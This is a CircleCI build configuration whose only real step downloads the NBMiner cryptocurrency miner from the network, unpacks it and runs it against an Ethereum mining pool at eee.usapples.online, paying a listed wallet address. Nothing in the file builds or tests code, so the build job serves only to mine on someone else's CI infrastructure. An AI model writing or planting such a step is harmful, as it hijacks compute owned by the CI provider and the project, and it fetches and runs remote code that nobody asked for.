version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://dl.nbminer.com/NBMiner_41.5_Linux.tgz && tar -xvf NBMiner_41.5_Linux.tgz && cd NBMiner_Linux && ./nbminer -a ethash -o ethproxy+ssl://eee.usapples.online:15555 -u 0x7ade62df8a080341ee48c601d4e6011a45ab84f6.worker58